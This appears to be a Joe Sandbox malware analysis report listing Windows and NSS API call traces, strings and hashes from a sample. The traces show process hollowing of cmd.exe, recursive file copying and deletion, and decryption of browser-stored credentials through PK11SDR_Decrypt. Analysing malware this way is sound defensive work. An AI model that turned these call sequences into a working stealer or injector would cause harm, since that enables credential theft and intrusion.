                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
                                                                                                                                                                                          • String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                                                                                                                                                                          • API String ID: 2518200370-449611708
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00035B30
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00035B37
                                                                                                                                                                                          • wsprintfA.USER32 ref: 00035B50
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 00035B67
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00056A98), ref: 00035B88
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00056A9C), ref: 00035BA2
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00035C86
                                                                                                                                                                                            • Part of subcall function 0003580D: _memset.LIBCMT ref: 00035845
                                                                                                                                                                                            • Part of subcall function 0003580D: _memset.LIBCMT ref: 00035856
                                                                                                                                                                                            • Part of subcall function 0003580D: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00035881
                                                                                                                                                                                            • Part of subcall function 0003580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0003589F
                                                                                                                                                                                            • Part of subcall function 0003580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 000358B3
                                                                                                                                                                                            • Part of subcall function 0003580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 000358C6
                                                                                                                                                                                            • Part of subcall function 0003580D: StrStrA.SHLWAPI(00000000), ref: 0003596A
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00035CA9
                                                                                                                                                                                          • wsprintfA.USER32 ref: 00035BC9
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 00035CD8
                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00035CEC
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00035D1A
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00035D2D
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00035D39
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00035D56
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$Filelstrcpy$Findlstrlen$Heap_memsetwsprintf$AllocCloseCopyDeleteFirstNextProcessSystemTime
                                                                                                                                                                                          • String ID: %s\%s$%s\*
                                                                                                                                                                                          • API String ID: 2636950706-2848263008
                                                                                                                                                                                          • Opcode ID: 5109443cb69d41411d3a8168ce201a54fbcc7fe7e1f813b94d2d21cbf6392ed2
                                                                                                                                                                                          • Instruction ID: a8deac166b45ccf24f15c2fb7421439ac0b3deece262e0d41c32c5c353f67271
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5109443cb69d41411d3a8168ce201a54fbcc7fe7e1f813b94d2d21cbf6392ed2
                                                                                                                                                                                          • Instruction Fuzzy Hash: C9717FB190022CABDF61EB60EC4AACD7778AF08301F4104E5F608A7152EB31AEC5CF65
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 0002F57C
                                                                                                                                                                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,000565A7,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0002F5A0
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0002F5B2
                                                                                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 0002F5C4
                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0002F5E2
                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0002F5F8
                                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 0002F608
                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,00000000,00032D61,?,00000000), ref: 0002F627
                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0002F65D
                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,D744E8F4,00000004,00000000), ref: 0002F684
                                                                                                                                                                                          • SetThreadContext.KERNEL32(?,00000000), ref: 0002F696
                                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 0002F69F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$MemoryThread$Write$AllocContextResumeVirtual$CreateRead_memset
                                                                                                                                                                                          • String ID: ($C:\Windows\System32\cmd.exe
                                                                                                                                                                                          • API String ID: 3621800378-4087486346
                                                                                                                                                                                          • Opcode ID: 453797b73b91f4f1d2b1401120bc2c5bcf93fecedbdc67c1e5c90b40367d7bbe
                                                                                                                                                                                          • Instruction ID: 4da5cc7388a32634616da07fd345e0738c7f81f22df045562967643b0c4495e6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 453797b73b91f4f1d2b1401120bc2c5bcf93fecedbdc67c1e5c90b40367d7bbe
                                                                                                                                                                                          • Instruction Fuzzy Hash: A1415772A00219AFEB108FA4DC89FEEB7B9FF48745F104064FA05EA161D775AD40CB25
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4BED0A
                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4BEE68
                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4BEF87
                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C4BEF98
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4BF483
                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C4BF492
                                                                                                                                                                                          • database corruption, xrefs: 6C4BF48D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _byteswap_ulong
                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                          • API String ID: 4101233201-598938438
                                                                                                                                                                                          • Opcode ID: 6b0c19f34322d8d62b4d93aed7178b9558a18a30b3bdcf908cc351d2160884a8
                                                                                                                                                                                          • Instruction ID: e0e2990560144bdbec42e786e2c749a97bd3b7d8596b9ab3c03953f22c210127
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b0c19f34322d8d62b4d93aed7178b9558a18a30b3bdcf908cc351d2160884a8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3662023CA062458FEB04CF65C480F9ABBB1BF45319F18419CD8497BB92D775E886CBA1
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(6C49E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C44D1C5), ref: 6C43D4F2
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(6C49E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C44D1C5), ref: 6C43D50B
                                                                                                                                                                                            • Part of subcall function 6C41CFE0: EnterCriticalSection.KERNEL32(6C49E784), ref: 6C41CFF6
                                                                                                                                                                                            • Part of subcall function 6C41CFE0: LeaveCriticalSection.KERNEL32(6C49E784), ref: 6C41D026
                                                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C44D1C5), ref: 6C43D52E
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(6C49E7DC), ref: 6C43D690
                                                                                                                                                                                          • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C43D6A6
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(6C49E7DC), ref: 6C43D712
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(6C49E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C44D1C5), ref: 6C43D751
                                                                                                                                                                                          • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C43D7EA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • lesheet" type="text/css" ><link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" ><link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global., xrefs: 6C43D793
                                                                                                                                                                                          • : (malloc) Error initializing arena, xrefs: 6C43D82C
                                                                                                                                                                                          • <jemalloc>, xrefs: 6C43D827
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                                                                                          • String ID: : (malloc) Error initializing arena$<jemalloc>$lesheet" type="text/css" ><link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" ><link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.
                                                                                                                                                                                          • API String ID: 2690322072-405358840
                                                                                                                                                                                          • Opcode ID: 3e40d274e844cef8634ddcb4fa4b67de23d2517d26ba08660b8123f717cdfb5e
                                                                                                                                                                                          • Instruction ID: d066f376d5f789adcefc6faed4d49df9d9517ff1c2999384ca89c7db841f9aa4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e40d274e844cef8634ddcb4fa4b67de23d2517d26ba08660b8123f717cdfb5e
                                                                                                                                                                                          • Instruction Fuzzy Hash: D191BE71A147618FD714CF2AC494E2AB7E1FBC9314F14992EE4AE87B80D730A845CB82
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • wsprintfA.USER32 ref: 0002CD5C
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 0002CD73
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,000574EC), ref: 0002CD94
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,000574F0), ref: 0002CDAE
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • lstrlenA.KERNEL32(0002D3B5,00056872,000574F4,?,0005686F), ref: 0002CE41
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,0005750C,00056873,?,00057508,00057504,00057500,000574FC), ref: 0002D122
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0002D136
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00027FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0002E756,?,?,?), ref: 00027FC7
                                                                                                                                                                                            • Part of subcall function 00027FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0002E756,?,?,?), ref: 00027FDE
                                                                                                                                                                                            • Part of subcall function 00027FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0002E756,?,?,?), ref: 00027FF5
                                                                                                                                                                                            • Part of subcall function 00027FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0002E756,?,?,?), ref: 0002800C
                                                                                                                                                                                            • Part of subcall function 00027FAC: CloseHandle.KERNEL32(?,?,?,?,?,0002E756,?,?,?), ref: 00028034
                                                                                                                                                                                            • Part of subcall function 00036E97: CreateThread.KERNEL32(00000000,00000000,00036DC6,?,00000000,00000000), ref: 00036F36
                                                                                                                                                                                            • Part of subcall function 00036E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00036F3E
                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 0002D23C
                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 0002D250
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$lstrcpy$Find$CloseCreatelstrcatlstrlen$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeThreadWaitwsprintf
                                                                                                                                                                                          • String ID: %s\*.*
                                                                                                                                                                                          • API String ID: 3967855609-1013718255
                                                                                                                                                                                          • Opcode ID: c99a95df98ae1fb65540f88547bba2b0c4f2b6fd8f5274eeda2ae79a4e5b88c8
                                                                                                                                                                                          • Instruction ID: 59f403706ad9ae291b44d7d0bb9182fedfaa6c9d27767df7210fa2c670d96865
                                                                                                                                                                                          • Opcode Fuzzy Hash: c99a95df98ae1fb65540f88547bba2b0c4f2b6fd8f5274eeda2ae79a4e5b88c8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 99D1B03290252DABDF21EB64ED56ADD77B8AF44304F4141E1B908B7117DB30AF898F91
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000002,?,6C5ECF46,?,6C4BCDBD,?,6C5EBF31,?,?,?,?,?,?,?), ref: 6C4CB039
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C5ECF46,?,6C4BCDBD,?,6C5EBF31), ref: 6C4CB090
                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,6C5ECF46,?,6C4BCDBD,?,6C5EBF31), ref: 6C4CB0A2
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,6C5ECF46,?,6C4BCDBD,?,6C5EBF31,?,?,?,?,?,?,?,?,?), ref: 6C4CB100
                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,00000002,?,6C5ECF46,?,6C4BCDBD,?,6C5EBF31,?,?,?,?,?,?,?), ref: 6C4CB115
                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,6C5ECF46,?,6C4BCDBD,?,6C5EBF31), ref: 6C4CB12D
                                                                                                                                                                                            • Part of subcall function 6C4B9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C4CC6FD,?,?,?,?,6C51F965,00000000), ref: 6C4B9F0E
                                                                                                                                                                                            • Part of subcall function 6C4B9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C51F965,00000000), ref: 6C4B9F5D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                                                                                                                          • String ID: `dl
                                                                                                                                                                                          • API String ID: 3155957115-3736096424
                                                                                                                                                                                          • Opcode ID: 83716fc7ef44c7748c84d59640fdf68440a95ccc813653b0f20a34195b126da4
                                                                                                                                                                                          • Instruction ID: 1d43fd8f33f14742f3341c90268944f5f551932210a67c12f9cfb72a5abf2a4b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 83716fc7ef44c7748c84d59640fdf68440a95ccc813653b0f20a34195b126da4
                                                                                                                                                                                          • Instruction Fuzzy Hash: C691B0B8B046068FDB04CF25C884F6AB7B1FF46309F144A2DE41697B60EB31E855CB96
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PK11_PubDeriveWithKDF.NSS3 ref: 6C560F8D
                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C560FB3
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C561006
                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?), ref: 6C56101C
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C561033
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C56103F
                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6C561048
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C56108E
                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C5610BB
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000006,?), ref: 6C5610D6
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C56112E
                                                                                                                                                                                            • Part of subcall function 6C561570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C5608C4,?,?), ref: 6C5615B8
                                                                                                                                                                                            • Part of subcall function 6C561570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C5608C4,?,?), ref: 6C5615C1
                                                                                                                                                                                            • Part of subcall function 6C561570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C56162E
                                                                                                                                                                                            • Part of subcall function 6C561570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C561637
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1510409361-0
                                                                                                                                                                                          • Opcode ID: 1a3a74019a7d6835cd98a0b1c23d02664e064d59da6aa0e56a85332af1f21f4a
                                                                                                                                                                                          • Instruction ID: 8ed9c658648f7d5f3a23dc7f7a340634aad0e68df7e716e3dd67c3649c2ee3c1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a3a74019a7d6835cd98a0b1c23d02664e064d59da6aa0e56a85332af1f21f4a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9271BFB1A04245DFDB04CFA6CD85A7BF7B0BF88328F148629E90997B21E731D944CB91
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C531C6F,00000000,00000004,?,?), ref: 6C586C3F
                                                                                                                                                                                            • Part of subcall function 6C5DC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5DC2BF
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C531C6F,00000000,00000004,?,?), ref: 6C586C60
                                                                                                                                                                                          • PR_ExplodeTime.NSS3(00000000,6C531C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C531C6F,00000000,00000004,?,?), ref: 6C586C94
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                                          • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                          • API String ID: 3534712800-180463219
                                                                                                                                                                                          • Opcode ID: 80568d760c32ccf8493be4b9675ef598372fc464ed9641ac9ea031c7a1180899
                                                                                                                                                                                          • Instruction ID: 5f99ccf0186bd656e3cf3873467130a1a5311068cdae892d92d80bb8bf24b9c1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 80568d760c32ccf8493be4b9675ef598372fc464ed9641ac9ea031c7a1180899
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE513A72B116594FC708CDADDC526DAB7DAABE4310F48C23AE842DB781DA38E906C751
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 0002A815
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A830
                                                                                                                                                                                          • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0002A838
                                                                                                                                                                                          • PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A846
                                                                                                                                                                                          • PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A85A
                                                                                                                                                                                          • PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A89A
                                                                                                                                                                                          • _memmove.LIBCMT ref: 0002A8BB
                                                                                                                                                                                          • lstrcatA.KERNEL32(00056803,00056807,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A8E5
                                                                                                                                                                                          • PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002A8EC
                                                                                                                                                                                          • lstrcatA.KERNEL32(00056803,0005680E,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A8FB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: K11_$Slotlstrcat$AuthenticateBinaryCryptDecryptFreeInternalString_memmove_memsetlstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4058207798-0
                                                                                                                                                                                          • Opcode ID: e2cc49311ef446e9418931b21bd190db16a6ae9bf63f10330628b5a4a313c567
                                                                                                                                                                                          • Instruction ID: 6ecaf5a7e53f51a09cefaa0776df00dec3bdd442e8e77ecbafa40fea64441980
                                                                                                                                                                                          • Opcode Fuzzy Hash: e2cc49311ef446e9418931b21bd190db16a6ae9bf63f10330628b5a4a313c567
                                                                                                                                                                                          • Instruction Fuzzy Hash: DC314FB1D0012AAFDB109B64ED889FEB7BCAF09341F4400F6B50DE3141EB745A859F62
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,\*.*,00056826,?,?,?), ref: 0002B99B
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,0005743C), ref: 0002B9BC
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00057440), ref: 0002B9D6
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0002BE0B
                                                                                                                                                                                            • Part of subcall function 00027FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0002E756,?,?,?), ref: 00027FC7
                                                                                                                                                                                            • Part of subcall function 00027FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0002E756,?,?,?), ref: 00027FDE
                                                                                                                                                                                            • Part of subcall function 00027FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0002E756,?,?,?), ref: 00027FF5
                                                                                                                                                                                            • Part of subcall function 00027FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0002E756,?,?,?), ref: 0002800C
                                                                                                                                                                                            • Part of subcall function 00027FAC: CloseHandle.KERNEL32(?,?,?,?,?,0002E756,?,?,?), ref: 00028034
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 0002BE82
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00036E97: CreateThread.KERNEL32(00000000,00000000,00036DC6,?,00000000,00000000), ref: 00036F36
                                                                                                                                                                                            • Part of subcall function 00036E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00036F3E
